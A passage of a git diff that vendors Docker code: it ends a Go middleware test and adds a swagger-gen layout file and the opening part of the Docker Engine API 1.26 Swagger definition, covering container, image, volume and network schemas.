+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/middleware"
+
+	"golang.org/x/net/context"
+)
+
+func TestMiddlewares(t *testing.T) {
+	cfg := &Config{
+		Version: "0.1omega2",
+	}
+	srv := &Server{
+		cfg: cfg,
+	}
+
+	srv.UseMiddleware(middleware.NewVersionMiddleware("0.1omega2", api.DefaultVersion, api.MinVersion))
+
+	req, _ := http.NewRequest("GET", "/containers/json", nil)
+	resp := httptest.NewRecorder()
+	ctx := context.Background()
+
+	localHandler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		if httputils.VersionFromContext(ctx) == "" {
+			t.Fatalf("Expected version, got empty string")
+		}
+
+		if sv := w.Header().Get("Server"); !strings.Contains(sv, "Docker/0.1omega2") {
+			t.Fatalf("Expected server version in the header `Docker/0.1omega2`, got %s", sv)
+		}
+
+		return nil
+	}
+
+	handlerFunc := srv.handlerWithGlobalMiddlewares(localHandler)
+	if err := handlerFunc(ctx, resp, req, map[string]string{}); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/swagger-gen.yaml b/vendor/github.com/docker/docker/api/swagger-gen.yaml
new file mode 100644
index 0000000000..f07a02737f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/swagger-gen.yaml
@@ -0,0 +1,12 @@
+
+layout:
+  models:
+    - name: definition
+      source: asset:model
+      target: "{{ joinFilePath .Target .ModelPackage }}"
+      file_name: "{{ (snakize (pascalize .Name)) }}.go"
+  operations:
+    - name: handler
+      source: asset:serverOperation
+      target: "{{ joinFilePath .Target .APIPackage .Package }}"
+      file_name: "{{ (snakize (pascalize .Name)) }}.go"
diff --git a/vendor/github.com/docker/docker/api/swagger.yaml b/vendor/github.com/docker/docker/api/swagger.yaml
new file mode 100644
index 0000000000..d19e8c9ca8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/swagger.yaml
@@ -0,0 +1,7785 @@
+# A Swagger 2.0 (a.k.a. OpenAPI) definition of the Engine API.
+#
+# This is used for generating API documentation and the types used by the
+# client/server. See api/README.md for more information.
+#
+# Some style notes:
+# - This file is used by ReDoc, which allows GitHub Flavored Markdown in
+#   descriptions.
+# - There is no maximum line length, for ease of editing and pretty diffs.
+# - operationIds are in the format "NounVerb", with a singular noun.
+
+swagger: "2.0"
+schemes:
+  - "http"
+  - "https"
+produces:
+  - "application/json"
+  - "text/plain"
+consumes:
+  - "application/json"
+  - "text/plain"
+basePath: "/v1.26"
+info:
+  title: "Docker Engine API"
+  version: "1.26"
+  x-logo:
+    url: "https://docs.docker.com/images/logo-docker-main.png"
+  description: |
+    The Engine API is an HTTP API served by Docker Engine. It is the API the Docker client uses to communicate with the Engine, so everything the Docker client can do can be done with the API.
+
+    Most of the client's commands map directly to API endpoints (e.g. `docker ps` is `GET /containers/json`). The notable exception is running containers, which consists of several API calls.
+
+    # Errors
+
+    The API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format:
+
+    ```
+    {
+      "message": "page not found"
+    }
+    ```
+
+    # Versioning
+
+    The API is usually changed in each release of Docker, so API calls are versioned to ensure that clients don't break.
+
+    For Docker Engine >= 1.13.1, the API version is 1.26. To lock to this version, you prefix the URL with `/v1.26`. For example, calling `/info` is the same as calling `/v1.26/info`.
+
+    Engine releases in the near future should support this version of the API, so your client will continue to work even if it is talking to a newer Engine.
+
+    In previous versions of Docker, it was possible to access the API without providing a version. This behaviour is now deprecated will be removed in a future version of Docker.
+
+    The API uses an open schema model, which means server may add extra properties to responses. Likewise, the server will ignore any extra query parameters and request body properties. When you write clients, you need to ignore additional properties in responses to ensure they do not break when talking to newer Docker daemons.
+
+    This documentation is for version 1.26 of the API, which was introduced with Docker 1.13.1. Use this table to find documentation for previous versions of the API:
+
+    Docker version  | API version | Changes
+    ----------------|-------------|---------
+    1.13.0 | [1.25](https://docs.docker.com/engine/api/v1.25/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-25-api-changes)
+    1.12.x | [1.24](https://docs.docker.com/engine/api/v1.24/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-24-api-changes)
+    1.11.x | [1.23](https://docs.docker.com/engine/api/v1.23/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-23-api-changes)
+    1.10.x | [1.22](https://docs.docker.com/engine/api/v1.22/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-22-api-changes)
+    1.9.x | [1.21](https://docs.docker.com/engine/api/v1.21/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-21-api-changes)
+    1.8.x | [1.20](https://docs.docker.com/engine/api/v1.20/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-20-api-changes)
+    1.7.x | [1.19](https://docs.docker.com/engine/api/v1.19/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-19-api-changes)
+    1.6.x | [1.18](https://docs.docker.com/engine/api/v1.18/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-18-api-changes)
+
+    # Authentication
+
+    Authentication for registries is handled client side. The client has to send authentication details to various endpoints that need to communicate with registries, such as `POST /images/(name)/push`. These are sent as `X-Registry-Auth` header as a Base64 encoded (JSON) string with the following structure:
+
+    ```
+    {
+      "username": "string",
+      "password": "string",
+      "email": "string",
+      "serveraddress": "string"
+    }
+    ```
+
+    The `serveraddress` is a domain/IP without a protocol. Throughout this structure, double quotes are required.
+
+    If you have already got an identity token from the [`/auth` endpoint](#operation/SystemAuth), you can just pass this instead of credentials:
+
+    ```
+    {
+      "identitytoken": "9cbaf023786cd7..."
+    }
+    ```
+
+# The tags on paths define the menu sections in the ReDoc documentation, so
+# the usage of tags must make sense for that:
+# - They should be singular, not plural.
+# - There should not be too many tags, or the menu becomes unwieldly. For
+#   example, it is preferable to add a path to the "System" tag instead of
+#   creating a tag with a single path in it.
+# - The order of tags in this list defines the order in the menu.
+tags:
+  # Primary objects
+  - name: "Container"
+    x-displayName: "Containers"
+    description: |
+      Create and manage containers.
+  - name: "Image"
+    x-displayName: "Images"
+  - name: "Network"
+    x-displayName: "Networks"
+    description: |
+      Networks are user-defined networks that containers can be attached to. See the [networking documentation](https://docs.docker.com/engine/userguide/networking/) for more information.
+  - name: "Volume"
+    x-displayName: "Volumes"
+    description: |
+      Create and manage persistent storage that can be attached to containers.
+  - name: "Exec"
+    x-displayName: "Exec"
+    description: |
+      Run new commands inside running containers. See the [command-line reference](https://docs.docker.com/engine/reference/commandline/exec/) for more information.
+
+      To exec a command in a container, you first need to create an exec instance, then start it. These two API endpoints are wrapped up in a single command-line command, `docker exec`.
+  - name: "Secret"
+    x-displayName: "Secrets"
+  # Swarm things
+  - name: "Swarm"
+    x-displayName: "Swarm"
+    description: |
+      Engines can be clustered together in a swarm. See [the swarm mode documentation](https://docs.docker.com/engine/swarm/) for more information.
+  - name: "Node"
+    x-displayName: "Nodes"
+    description: |
+      Nodes are instances of the Engine participating in a swarm. Swarm mode must be enabled for these endpoints to work.
+  - name: "Service"
+    x-displayName: "Services"
+    description: |
+      Services are the definitions of tasks to run on a swarm. Swarm mode must be enabled for these endpoints to work.
+  - name: "Task"
+    x-displayName: "Tasks"
+    description: |
+      A task is a container running on a swarm. It is the atomic scheduling unit of swarm. Swarm mode must be enabled for these endpoints to work.
+  # System things
+  - name: "Plugin"
+    x-displayName: "Plugins"
+  - name: "System"
+    x-displayName: "System"
+
+definitions:
+  Port:
+    type: "object"
+    description: "An open port on a container"
+    required: [PrivatePort, Type]
+    properties:
+      IP:
+        type: "string"
+        format: "ip-address"
+      PrivatePort:
+        type: "integer"
+        format: "uint16"
+        x-nullable: false
+        description: "Port on the container"
+      PublicPort:
+        type: "integer"
+        format: "uint16"
+        description: "Port exposed on the host"
+      Type:
+        type: "string"
+        x-nullable: false
+        enum: ["tcp", "udp"]
+    example:
+      PrivatePort: 8080
+      PublicPort: 80
+      Type: "tcp"
+
+  MountPoint:
+    type: "object"
+    description: "A mount point inside a container"
+    properties:
+      Type:
+        type: "string"
+      Name:
+        type: "string"
+      Source:
+        type: "string"
+      Destination:
+        type: "string"
+      Driver:
+        type: "string"
+      Mode:
+        type: "string"
+      RW:
+        type: "boolean"
+      Propagation:
+        type: "string"
+
+  DeviceMapping:
+    type: "object"
+    description: "A device mapping between the host and container"
+    properties:
+      PathOnHost:
+        type: "string"
+      PathInContainer:
+        type: "string"
+      CgroupPermissions:
+        type: "string"
+    example:
+      PathOnHost: "/dev/deviceName"
+      PathInContainer: "/dev/deviceName"
+      CgroupPermissions: "mrw"
+
+  ThrottleDevice:
+    type: "object"
+    properties:
+      Path:
+        description: "Device path"
+        type: "string"
+      Rate:
+        description: "Rate"
+        type: "integer"
+        format: "int64"
+        minimum: 0
+
+  Mount:
+    type: "object"
+    properties:
+      Target:
+        description: "Container path."
+        type: "string"
+      Source:
+        description: "Mount source (e.g. a volume name, a host path)."
+      Type:
+        description: |
+          The mount type. Available types:
+
+          - `bind` Mounts a file or directory from the host into the container. Must exist prior to creating the container.
+          - `volume` Creates a volume with the given name and options (or uses a pre-existing volume with the same name and options). These are **not** removed when the container is removed.
+          - `tmpfs` Create a tmpfs with the given options. The mount source cannot be specified for tmpfs.
+        type: "string"
+        enum:
+          - "bind"
+          - "volume"
+          - "tmpfs"
+      ReadOnly:
+        description: "Whether the mount should be read-only."
+        type: "boolean"
+      BindOptions:
+        description: "Optional configuration for the `bind` type."
+        type: "object"
+        properties:
+          Propagation:
+            description: "A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`."
+            enum:
+              - "private"
+              - "rprivate"
+              - "shared"
+              - "rshared"
+              - "slave"
+              - "rslave"
+      VolumeOptions:
+        description: "Optional configuration for the `volume` type."
+        type: "object"
+        properties:
+          NoCopy:
+            description: "Populate volume with data from the target."
+            type: "boolean"
+            default: false
+          Labels:
+            description: "User-defined key/value metadata."
+            type: "object"
+            additionalProperties:
+              type: "string"
+          DriverConfig:
+            description: "Map of driver specific options"
+            type: "object"
+            properties:
+              Name:
+                description: "Name of the driver to use to create the volume."
+                type: "string"
+              Options:
+                description: "key/value map of driver specific options."
+                type: "object"
+                additionalProperties:
+                  type: "string"
+      TmpfsOptions:
+        description: "Optional configuration for the `tmpfs` type."
+        type: "object"
+        properties:
+          SizeBytes:
+            description: "The size for the tmpfs mount in bytes."
+            type: "integer"
+            format: "int64"
+          Mode:
+            description: "The permission mode for the tmpfs mount in an integer."
+            type: "integer"
+  RestartPolicy:
+    description: |
+      The behavior to apply when the container exits. The default is not to restart.
+
+      An ever increasing delay (double the previous delay, starting at 100ms) is added before each restart to prevent flooding the server.
+    type: "object"
+    properties:
+      Name:
+        type: "string"
+        description: |
+          - `always` Always restart
+          - `unless-stopped` Restart always except when the user has manually stopped the container
+          - `on-failure` Restart only when the container exit code is non-zero
+        enum:
+          - "always"
+          - "unless-stopped"
+          - "on-failure"
+      MaximumRetryCount:
+        type: "integer"
+        description: "If `on-failure` is used, the number of times to retry before giving up"
+    default: {}
+
+  Resources:
+    description: "A container's resources (cgroups config, ulimits, etc)"
+    type: "object"
+    properties:
+      # Applicable to all platforms
+      CpuShares:
+        description: "An integer value representing this container's relative CPU weight versus other containers."
+        type: "integer"
+      Memory:
+        description: "Memory limit in bytes."
+        type: "integer"
+        default: 0
+      # Applicable to UNIX platforms
+      CgroupParent:
+        description: "Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist."
+        type: "string"
+      BlkioWeight:
+        description: "Block IO weight (relative weight)."
+        type: "integer"
+        minimum: 0
+        maximum: 1000
+      BlkioWeightDevice:
+        description: |
+          Block IO weight (relative device weight) in the form `[{"Path": "device_path", "Weight": weight}]`.
+        type: "array"
+        items:
+          type: "object"
+          properties:
+            Path:
+              type: "string"
+            Weight:
+              type: "integer"
+              minimum: 0
+      BlkioDeviceReadBps:
+        description: |
+          Limit read rate (bytes per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`.
+        type: "array"
+        items:
+          $ref: "#/definitions/ThrottleDevice"
+      BlkioDeviceWriteBps:
+        description: |
+          Limit write rate (bytes per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`.
+        type: "array"
+        items:
+          $ref: "#/definitions/ThrottleDevice"
+      BlkioDeviceReadIOps:
+        description: |
+          Limit read rate (IO per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`.
+        type: "array"
+        items:
+          $ref: "#/definitions/ThrottleDevice"
+      BlkioDeviceWriteIOps:
+        description: |
+          Limit write rate (IO per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`.
+        type: "array"
+        items:
+          $ref: "#/definitions/ThrottleDevice"
+      CpuPeriod:
+        description: "The length of a CPU period in microseconds."
+        type: "integer"
+        format: "int64"
+      CpuQuota:
+        description: "Microseconds of CPU time that the container can get in a CPU period."
+        type: "integer"
+        format: "int64"
+      CpuRealtimePeriod:
+        description: "The length of a CPU real-time period in microseconds. Set to 0 to allocate no time allocated to real-time tasks."
+        type: "integer"
+        format: "int64"
+      CpuRealtimeRuntime:
+        description: "The length of a CPU real-time runtime in microseconds. Set to 0 to allocate no time allocated to real-time tasks."
+        type: "integer"
+        format: "int64"
+      CpusetCpus:
+        description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)"
+        type: "string"
+      CpusetMems:
+        description: "Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems."
+        type: "string"
+      Devices:
+        description: "A list of devices to add to the container."
+        type: "array"
+        items:
+          $ref: "#/definitions/DeviceMapping"
+      DiskQuota:
+        description: "Disk limit (in bytes)."
+        type: "integer"
+        format: "int64"
+      KernelMemory:
+        description: "Kernel memory limit in bytes."
+        type: "integer"
+        format: "int64"
+      MemoryReservation:
+        description: "Memory soft limit in bytes."
+        type: "integer"
+        format: "int64"
+      MemorySwap:
+        description: "Total memory limit (memory + swap). Set as `-1` to enable unlimited swap."
+        type: "integer"
+        format: "int64"
+      MemorySwappiness:
+        description: "Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100."
+        type: "integer"
+        format: "int64"
+        minimum: 0
+        maximum: 100
+      NanoCPUs:
+        description: "CPU quota in units of 10<sup>-9</sup> CPUs."
+        type: "integer"
+        format: "int64"
+      OomKillDisable:
+        description: "Disable OOM Killer for the container."
+        type: "boolean"
+      PidsLimit:
+        description: "Tune a container's pids limit. Set -1 for unlimited."
+        type: "integer"
+        format: "int64"
+      Ulimits:
+        description: |
+          A list of resource limits to set in the container. For example: `{"Name": "nofile", "Soft": 1024, "Hard": 2048}`"
+        type: "array"
+        items:
+          type: "object"
+          properties:
+            Name:
+              description: "Name of ulimit"
+              type: "string"
+            Soft:
+              description: "Soft limit"
+              type: "integer"
+            Hard:
+              description: "Hard limit"
+              type: "integer"
+      # Applicable to Windows
+      CpuCount:
+        description: |
+          The number of usable CPUs (Windows only).
+
+          On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last.
+        type: "integer"
+        format: "int64"
+      CpuPercent:
+        description: |
+          The usable percentage of the available CPUs (Windows only).
+
+          On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last.
+        type: "integer"
+        format: "int64"
+      IOMaximumIOps:
+        description: "Maximum IOps for the container system drive (Windows only)"
+        type: "integer"
+        format: "int64"
+      IOMaximumBandwidth:
+        description: "Maximum IO in bytes per second for the container system drive (Windows only)"
+        type: "integer"
+        format: "int64"
+
+  HostConfig:
+    description: "Container configuration that depends on the host we are running on"
+    allOf:
+      - $ref: "#/definitions/Resources"
+      - type: "object"
+        properties:
+          # Applicable to all platforms
+          Binds:
+            type: "array"
+            description: |
+              A list of volume bindings for this container. Each volume binding is a string in one of these forms:
+
+              - `host-src:container-dest` to bind-mount a host path into the container. Both `host-src`, and `container-dest` must be an _absolute_ path.
+              - `host-src:container-dest:ro` to make the bind-mount read-only inside the container. Both `host-src`, and `container-dest` must be an _absolute_ path.
+              - `volume-name:container-dest` to bind-mount a volume managed by a volume driver into the container. `container-dest` must be an _absolute_ path.
+              - `volume-name:container-dest:ro` to mount the volume read-only inside the container.  `container-dest` must be an _absolute_ path.
+            items:
+              type: "string"
+          ContainerIDFile:
+            type: "string"
+            description: "Path to a file where the container ID is written"
+          LogConfig:
+            type: "object"
+            description: "The logging configuration for this container"
+            properties:
+              Type:
+                type: "string"
+                enum:
+                  - "json-file"
+                  - "syslog"
+                  - "journald"
+                  - "gelf"
+                  - "fluentd"
+                  - "awslogs"
+                  - "splunk"
+                  - "etwlogs"
+                  - "none"
+              Config:
+                type: "object"
+                additionalProperties:
+                  type: "string"
+          NetworkMode:
+            type: "string"
+            description: "Network mode to use for this container. Supported standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
+              as a custom network's name to which this container should connect to."
+          PortBindings:
+            type: "object"
+            description: "A map of exposed container ports and the host port they should map to."
+            additionalProperties:
+              type: "object"
+              properties:
+                HostIp:
+                  type: "string"
+                  description: "The host IP address"
+                HostPort:
+                  type: "string"
+                  description: "The host port number, as a string"
+          RestartPolicy:
+            $ref: "#/definitions/RestartPolicy"
+          AutoRemove:
+            type: "boolean"
+            description: "Automatically remove the container when the container's process exits. This has no effect if `RestartPolicy` is set."
+          VolumeDriver:
+            type: "string"
+            description: "Driver that this container uses to mount volumes."
+          VolumesFrom:
+            type: "array"
+            description: "A list of volumes to inherit from another container, specified in the form `<container name>[:<ro|rw>]`."
+            items:
+              type: "string"
+          Mounts:
+            description: "Specification for mounts to be added to the container."
+            type: "array"
+            items:
+              $ref: "#/definitions/Mount"
+
+          # Applicable to UNIX platforms
+          CapAdd:
+            type: "array"
+            description: "A list of kernel capabilities to add to the container."
+            items:
+              type: "string"
+          CapDrop:
+            type: "array"
+            description: "A list of kernel capabilities to drop from the container."
+            items:
+              type: "string"
+          Dns:
+            type: "array"
+            description: "A list of DNS servers for the container to use."
+            items:
+              type: "string"
+          DnsOptions:
+            type: "array"
+            description: "A list of DNS options."
+            items:
+              type: "string"
+          DnsSearch:
+            type: "array"
+            description: "A list of DNS search domains."
+            items:
+              type: "string"
+          ExtraHosts:
+            type: "array"
+            description: |
+              A list of hostnames/IP mappings to add to the container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+            items:
+              type: "string"
+          GroupAdd:
+            type: "array"
+            description: "A list of additional groups that the container process will run as."
+            items:
+              type: "string"
+          IpcMode:
+            type: "string"
+            description: "IPC namespace to use for the container."
+          Cgroup:
+            type: "string"
+            description: "Cgroup to use for the container."
+          Links:
+            type: "array"
+            description: "A list of links for the container in the form `container_name:alias`."
+            items:
+              type: "string"
+          OomScoreAdj:
+            type: "integer"
+            description: "An integer value containing the score given to the container in order to tune OOM killer preferences."
+          PidMode:
+            type: "string"
+            description: |
+              Set the PID (Process) Namespace mode for the container. It can be either:
+
+              - `"container:<name|id>"`: joins another container's PID namespace
+              - `"host"`: use the host's PID namespace inside the container
+          Privileged:
+            type: "boolean"
+            description: "Gives the container full access to the host."
+          PublishAllPorts:
+            type: "boolean"
+            description: "Allocates a random host port for all of a container's exposed ports."
+          ReadonlyRootfs:
+            type: "boolean"
+            description: "Mount the container's root filesystem as read only."
+          SecurityOpt:
+            type: "array"
+            description: "A list of string values to customize labels for MLS
+            systems, such as SELinux."
+            items:
+              type: "string"
+          StorageOpt:
+            type: "object"
+            description: |
+              Storage driver options for this container, in the form `{"size": "120G"}`.
+            additionalProperties:
+              type: "string"
+          Tmpfs:
+            type: "object"
+            description: |
+              A map of container directories which should be replaced by tmpfs mounts, and their corresponding mount options. For example: `{ "/run": "rw,noexec,nosuid,size=65536k" }`.
+            additionalProperties:
+              type: "string"
+          UTSMode:
+            type: "string"
+            description: "UTS namespace to use for the container."
+          UsernsMode:
+            type: "string"
+            description: "Sets the usernamespace mode for the container when usernamespace remapping option is enabled."
+          ShmSize:
+            type: "integer"
+            description: "Size of `/dev/shm` in bytes. If omitted, the system uses 64MB."
+            minimum: 0
+          Sysctls:
+            type: "object"
+            description: |
+              A list of kernel parameters (sysctls) to set in the container. For example: `{"net.ipv4.ip_forward": "1"}`
+            additionalProperties:
+              type: "string"
+          Runtime:
+            type: "string"
+            description: "Runtime to use with this container."
+          # Applicable to Windows
+          ConsoleSize:
+            type: "array"
+            description: "Initial console size, as an `[height, width]` array. (Windows only)"
+            minItems: 2
+            maxItems: 2
+            items:
+              type: "integer"
+              minimum: 0
+          Isolation:
+            type: "string"
+            description: "Isolation technology of the container. (Windows only)"
+            enum:
+              - "default"
+              - "process"
+              - "hyperv"
+
+  Config:
+    description: "Configuration for a container that is portable between hosts"
+    type: "object"
+    properties:
+      Hostname:
+        description: "The hostname to use for the container, as a valid RFC 1123 hostname."
+        type: "string"
+      Domainname:
+        description: "The domain name to use for the container."
+        type: "string"
+      User:
+        description: "The user that commands are run as inside the container."
+        type: "string"
+      AttachStdin:
+        description: "Whether to attach to `stdin`."
+        type: "boolean"
+        default: false
+      AttachStdout:
+        description: "Whether to attach to `stdout`."
+        type: "boolean"
+        default: true
+      AttachStderr:
+        description: "Whether to attach to `stderr`."
+        type: "boolean"
+        default: true
+      ExposedPorts:
+        description: |
+          An object mapping ports to an empty object in the form:
+
+          `{"<port>/<tcp|udp>": {}}`
+        type: "object"
+        additionalProperties:
+          type: "object"
+          enum:
+            - {}
+          default: {}
+      Tty:
+        description: "Attach standard streams to a TTY, including `stdin` if it is not closed."
+        type: "boolean"
+        default: false
+      OpenStdin:
+        description: "Open `stdin`"
+        type: "boolean"
+        default: false
+      StdinOnce:
+        description: "Close `stdin` after one attached client disconnects"
+        type: "boolean"
+        default: false
+      Env:
+        description: |
+          A list of environment variables to set inside the container in the form `["VAR=value", ...]`
+        type: "array"
+        items:
+          type: "string"
+      Cmd:
+        description: "Command to run specified as a string or an array of strings."
+        type:
+          - "array"
+          - "string"
+        items:
+          type: "string"
+      Healthcheck:
+        description: "A test to perform to check that the container is healthy."
+        type: "object"
+        properties:
+          Test:
+            description: |
+              The test to perform. Possible values are:
+
+              - `{}` inherit healthcheck from image or parent image
+              - `{"NONE"}` disable healthcheck
+              - `{"CMD", args...}` exec arguments directly
+              - `{"CMD-SHELL", command}` run command with system's default shell
+            type: "array"
+            items:
+              type: "string"
+          Interval:
+            description: "The time to wait between checks in nanoseconds. 0 means inherit."
+            type: "integer"
+          Timeout:
+            description: "The time to wait before considering the check to have hung. 0 means inherit."
+            type: "integer"
+          Retries:
+            description: "The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit."
+            type: "integer"
+      ArgsEscaped:
+        description: "Command is already escaped (Windows only)"
+        type: "boolean"
+      Image:
+        description: "The name of the image to use when creating the container"
+        type: "string"
+      Volumes:
+        description: "An object mapping mount point paths inside the container to empty objects."
+        type: "object"
+        properties:
+          additionalProperties:
+            type: "object"
+            enum:
+              - {}
+            default: {}
+      WorkingDir:
+        description: "The working directory for commands to run in."
+        type: "string"
+      Entrypoint:
+        description: |
+          The entry point for the container as a string or an array of strings.
+
+          If the array consists of exactly one empty string (`[""]`) then the entry point is reset to system default (i.e., the entry point used by docker when there is no `ENTRYPOINT` instruction in the `Dockerfile`).
+        type:
+          - "array"
+          - "string"
+        items:
+          type: "string"
+      NetworkDisabled:
+        description: "Disable networking for the container."
+        type: "boolean"
+      MacAddress:
+        description: "MAC address of the container."
+        type: "string"
+      OnBuild:
+        description: "`ONBUILD` metadata that were defined in the image's `Dockerfile`."
+        type: "array"
+        items:
+          type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
+          type: "string"
+      StopSignal:
+        description: "Signal to stop a container as a string or unsigned integer."
+        type: "string"
+        default: "SIGTERM"
+      StopTimeout:
+        description: "Timeout to stop a container in seconds."
+        type: "integer"
+        default: 10
+      Shell:
+        description: "Shell for when `RUN`, `CMD`, and `ENTRYPOINT` uses a shell."
+        type: "array"
+        items:
+          type: "string"
+
+  NetworkConfig:
+    description: "TODO: check is correct"
+    type: "object"
+    properties:
+      Bridge:
+        type: "string"
+      Gateway:
+        type: "string"
+      Address:
+        type: "string"
+      IPPrefixLen:
+        type: "integer"
+      MacAddress:
+        type: "string"
+      PortMapping:
+        type: "string"
+      Ports:
+        type: "array"
+        items:
+          $ref: "#/definitions/Port"
+
+  GraphDriver:
+    description: "Information about this container's graph driver."
+    type: "object"
+    properties:
+      Name:
+        type: "string"
+      Data:
+        type: "object"
+        additionalProperties:
+          type: "string"
+
+  Image:
+    type: "object"
+    properties:
+      Id:
+        type: "string"
+      RepoTags:
+        type: "array"
+        items:
+          type: "string"
+      RepoDigests:
+        type: "array"
+        items:
+          type: "string"
+      Parent:
+        type: "string"
+      Comment:
+        type: "string"
+      Created:
+        type: "string"
+      Container:
+        type: "string"
+      ContainerConfig:
+        $ref: "#/definitions/Config"
+      DockerVersion:
+        type: "string"
+      Author:
+        type: "string"
+      Config:
+        $ref: "#/definitions/Config"
+      Architecture:
+        type: "string"
+      Os:
+        type: "string"
+      Size:
+        type: "integer"
+        format: "int64"
+      VirtualSize:
+        type: "integer"
+        format: "int64"
+      GraphDriver:
+        $ref: "#/definitions/GraphDriver"
+      RootFS:
+        type: "object"
+        properties:
+          Type:
+            type: "string"
+          Layers:
+            type: "array"
+            items:
+              type: "string"
+          BaseLayer:
+            type: "string"
+
+  ImageSummary:
+    type: "object"
+    required:
+      - Id
+      - ParentId
+      - RepoTags
+      - RepoDigests
+      - Created
+      - Size
+      - SharedSize
+      - VirtualSize
+      - Labels
+      - Containers
+    properties:
+      Id:
+        type: "string"
+        x-nullable: false
+      ParentId:
+        type: "string"
+        x-nullable: false
+      RepoTags:
+        type: "array"
+        x-nullable: false
+        items:
+          type: "string"
+      RepoDigests:
+        type: "array"
+        x-nullable: false
+        items:
+          type: "string"
+      Created:
+        type: "integer"
+        x-nullable: false
+      Size:
+        type: "integer"
+        x-nullable: false
+      SharedSize:
+        type: "integer"
+        x-nullable: false
+      VirtualSize:
+        type: "integer"
+        x-nullable: false
+      Labels:
+        type: "object"
+        x-nullable: false
+        additionalProperties:
+          type: "string"
+      Containers:
+        x-nullable: false
+        type: "integer"
+
+  AuthConfig:
+    type: "object"
+    properties:
+      username:
+        type: "string"
+      password:
+        type: "string"
+      email:
+        type: "string"
+      serveraddress:
+        type: "string"
+    example:
+      username: "hannibal"
+      password: "xxxx"
+      serveraddress: "https://index.docker.io/v1/"
+
+  ProcessConfig:
+    type: "object"
+    properties:
+      privileged:
+        type: "boolean"
+      user:
+        type: "string"
+      tty:
+        type: "boolean"
+      entrypoint:
+        type: "string"
+      arguments:
+        type: "array"
+        items:
+          type: "string"
+
+  Volume:
+    type: "object"
+    required: [Name, Driver, Mountpoint, Labels, Scope, Options]
+    properties:
+      Name:
+        type: "string"
+        description: "Name of the volume."
+        x-nullable: false
+      Driver:
+        type: "string"
+        description: "Name of the volume driver used by the volume."
+        x-nullable: false
+      Mountpoint:
+        type: "string"
+        description: "Mount path of the volume on the host."
+        x-nullable: false
+      Status:
+        type: "object"
+        description: |
+          Low-level details about the volume, provided by the volume driver.
+          Details are returned as a map with key/value pairs:
+          `{"key":"value","key2":"value2"}`.
+
+          The `Status` field is optional, and is omitted if the volume driver
+          does not support this feature.
+        additionalProperties:
+          type: "object"
+      Labels:
+        type: "object"
+        description: "User-defined key/value metadata."
+        x-nullable: false
+        additionalProperties:
+          type: "string"
+      Scope:
+        type: "string"
+        description: "The level at which the volume exists. Either `global` for cluster-wide, or `local` for machine level."
+        default: "local"
+        x-nullable: false
+        enum: ["local", "global"]
+      Options:
+        type: "object"
+        description: "The driver specific options used when creating the volume."
+        additionalProperties:
+          type: "string"
+      UsageData:
+        type: "object"
+        required: [Size, RefCount]
+        properties:
+          Size:
+            type: "integer"
+            description: "The disk space used by the volume (local driver only)"
+            default: -1
+            x-nullable: false
+          RefCount:
+            type: "integer"
+            default: -1
+            description: "The number of containers referencing this volume."
+            x-nullable: false
+
+    example:
+      Name: "tardis"
+      Driver: "custom"
+      Mountpoint: "/var/lib/docker/volumes/tardis"
+      Status:
+        hello: "world"
+      Labels:
+        com.example.some-label: "some-value"
+        com.example.some-other-label: "some-other-value"
+      Scope: "local"
+
+  Network:
+    type: "object"
+    properties:
+      Name:
+        type: "string"
+      Id:
+        type: "string"
+      Created:
+        type: "string"
+        format: "dateTime"
+      Scope:
+        type: "string"
+      Driver:
+        type: "string"
+      EnableIPv6:
+        type: "boolean"
+      IPAM:
+        $ref: "#/definitions/IPAM"
+      Internal:
+        type: "boolean"
+      Containers:
+        type: "object"
+        additionalProperties:
+          $ref: "#/definitions/NetworkContainer"
+      Options:
+        type: "object"
+        additionalProperties:
+          type: "string"
+      Labels:
+        type: "object"
+        additionalProperties:
+          type: "string"
+    example:
+      Name: "net01"
+      Id: "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99"
+      Created: "2016-10-19T04:33:30.360899459Z"
+      Scope: "local"
+      Driver: "bridge"
+      EnableIPv6: false
+      IPAM:
+        Driver: "default"
+        Config:
+          - Subnet: "172.19.0.0/16"
+            Gateway: "172.19.0.1"
+        Options:
+          foo: "bar"
+      Internal: false
+      Containers:
+        19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c:
+          Name: "test"
+          EndpointID: "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a"
+          MacAddress: "02:42:ac:13:00:02"
+          IPv4Address: "172.19.0.2/16"
+          IPv6Address: ""
+      Options:
+        com.docker.network.bridge.default_bridge: "true"
+        com.docker.network.bridge.enable_icc: "true"
